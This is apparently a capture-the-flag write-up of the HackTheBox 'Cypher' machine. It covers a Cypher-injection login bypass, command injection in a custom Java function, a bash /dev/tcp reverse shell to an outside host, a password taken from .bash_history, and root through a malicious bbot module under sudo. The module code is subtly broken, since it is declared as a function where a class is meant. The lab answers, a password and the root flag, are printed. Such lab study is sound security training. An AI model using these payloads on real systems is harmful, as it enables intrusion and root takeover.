Home » Posts » Cypher Writeup

Cypher Writeup

0x5t
0x5t avatar
Security Researcher
Team: RaptX
Posts: --
Joined: 2024
Posted:  |  Tags: HackTheBox, Linux, Cypher, Command Injection, SUID

This medium-difficulty HackTheBox machine involves a Cypher injection to bypass authentication on a web application, followed by a command injection vulnerability in a custom Java method to gain a foothold as the neo4j user. Privilege escalation is achieved by exploiting a sudo misconfiguration on the bbot utility to execute a custom module as root.

Quick Metadata

Item Value
Machine Cypher
Difficulty Medium
IP 10.10.10.10
OS Linux
Primary Vulns Cypher Injection, Command Injection, SUID abuse

Exploitation Chain (High-Level)

  1. Web enumeration reveals a login page for a custom application on cypher.htb.
  2. Cypher injection bypasses authentication, granting access to the application's query interface.
  3. A command injection vulnerability is discovered in a custom Java method within the application.
  4. The command injection is used to obtain a shell as the neo4j user.
  5. Credentials for the graphasm user are found in a bash_history file.
  6. A sudo misconfiguration allows graphasm to run /usr/local/bin/bbot as root.
  7. A custom bbot module is created and executed with root privileges to obtain the root flag.

Pre-Reqs

  • Tooling: nmap, feroxbuster, bbot, sudo
  • Skills: web application enumeration, source code analysis, command injection, SUID exploitation

Skills Required

  • Web Exploitation
  • Source Code Analysis
  • Basic Linux Enumeration

Skills Learned

  • Cypher Injection
  • Java Source Code Analysis
  • SUID abuse via custom bbot modules

Enumeration

Network Scan

The initial Nmap scan reveals two open ports: SSH on port 22 and HTTP on port 80. The HTTP service is running on nginx and redirects to cypher.htb.

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)

Nmap Commands

nmap -Pn -sC -sV -oN scans/initial.nmap 10.10.10.10

Add host entry:

echo "10.10.10.10 cypher.htb" | sudo tee -a /etc/hosts

Web Enumeration

After adding the host entry and navigating to the web page, a login form is presented. Submitting a single quote ' as the username returns a detailed error message from the backend, indicating a Cypher query syntax error. The error message reveals the query structure, which is MATCH (u:USER) - [:SECRET]-> (h:SHA1) WHERE u.name = ' <USERNAME> ' return h.value as hash.

Using feroxbuster (or similar tools) to fuzz the web root reveals a /testing directory. Inside this directory, a Java archive file custom-apoc-extension-1.0-SNAPSHOT.jar is found.

Credentials / Artifacts Discovered

Stage Credential / Token Usage
Foothold cypher:cypher (hash bypass) Initial authentication to graphasm web app
Lateral graphasm:cU4btyib.20xtCMCXkBmerhK SSH login
Priv Esc N/A sudo with NOPASSWD

Foothold

Initial Vulnerability (Cypher Injection)

The discovered Cypher query structure can be exploited using an injection to bypass the login. By providing a payload that forces the WHERE clause to always be true, authentication can be bypassed without knowing a valid user.

A valid Cypher injection payload is constructed to return a hash that matches the SHA1 hash of the password provided in the form.

Payload for username field: ' OR true return "93083541086a589b312bd3da38a8488d1fb14dcc" as hash; //

Password field: cypher

This payload authenticates successfully and grants access to the web application's query interface.

Pivot to Command Injection

Analysis of the custom-apoc-extension-1.0-SNAPSHOT.jar file reveals a getUrlStatusCode method in the CustomFunctions class. The method takes a URL as an argument and concatenates it directly into a system command without sanitization.

// Decompiled source code snippet
String command = "/bin/sh -c 'curl -s -o /dev/null --connect-timeout 1 %w (http_code) " + url;
Process process = Runtime.getRuntime().exec(command);

This vulnerability allows for command injection by using a semicolon ; to terminate the initial command and execute an arbitrary one.

Reverse Shell

The command injection is used to execute a reverse shell payload.

## Listener
nc -lvnp 9001
## Trigger
CALL custom.getUrlStatusCode('example.com; bash -c "bash -i >& /dev/tcp/11.11.11.11/9001 0>&1"')

Result: shell as neo4j user.

Shell Stabilization

python3 -c 'import pty,os; pty.spawn("/bin/bash")'
export TERM=xterm

Lateral Movement

Enumeration as Low-Priv User

A bash_history file is found in the neo4j user's home directory (/var/lib/neo4j). This file contains credentials for another user.

cat /var/lib/neo4j/.bash_history

The output reveals a neo4j-admin dbms set-initial-password command containing a password. This password, cU4btyib.20xtCMCXkBmerhK, is found to be valid for the graphasm user, another user discovered in /etc/passwd.

Pivot Technique (SSH)

The credentials are used to log in via SSH as the graphasm user.

ssh [email protected]

Privilege Escalation

Vector 1: bbot sudo Misconfiguration

Enumerating the sudo permissions for the graphasm user reveals that they can run /usr/local/bin/bbot as root without a password.

sudo -l

Evidence:

User graphasm may run the following commands on cypher:
 (ALL) NOPASSWD: /usr/local/bin/bbot

The bbot tool has a feature that allows custom modules to be loaded. By creating a custom Python module with a command to be executed and a YAML file to load it, root privileges can be obtained.

First, create a YAML file for the module configuration:

## /tmp/my_preset.yml
modules:
  - mymodule
module_dirs:
  - /tmp/my_modules

Next, create the Python module that contains the malicious payload:

## /tmp/my_modules/mymodule.py
from bbot.modules.base import BaseModule
import os

def MyModule(BaseModule):
    watched_events = ["DNS_NAME"]
    async def handle_event(self, event):
        os.system("cat /root/root.txt > /tmp/flag")

Exploit:

sudo /usr/local/bin/bbot -p /tmp/my_preset.yml --force

This command runs bbot as root, which loads the custom module. The os.system command in the module is executed with root privileges, copying the root flag to /tmp/flag.

Post-Exploitation (Hashes / Loot)

The root flag is read from the /tmp/flag file created by the custom module.

cat /tmp/flag

Root Flag

13b2e3c91f90b77e1bd91c2243b41761

Hash / Flag: 13b2e3c91f90b77e1bd91c2243b41761

Summary

  1. A web application on cypher.htb was identified with a login page susceptible to Cypher injection.
  2. A successful Cypher injection was used to bypass authentication and gain access to the application's query functionality.
  3. Source code analysis of a JAR file found on the web server revealed a command injection vulnerability.
  4. The command injection was exploited to gain an initial shell as the neo4j user.
  5. Credentials for the graphasm user were discovered in the neo4j user's .bash_history file, allowing lateral movement via SSH.
  6. The graphasm user had NOPASSWD sudo privileges for the bbot utility, which was abused by loading a custom module to execute commands as root.

Lessons Learned

  • Insecure string concatenation in application code can lead to critical command injection vulnerabilities.
  • Improper sudo permissions can be a direct path to root, even for complex or custom tools.
  • Thorough enumeration of user files, such as .bash_history, can often yield valuable credentials or configuration details.
Back to Posts
Contents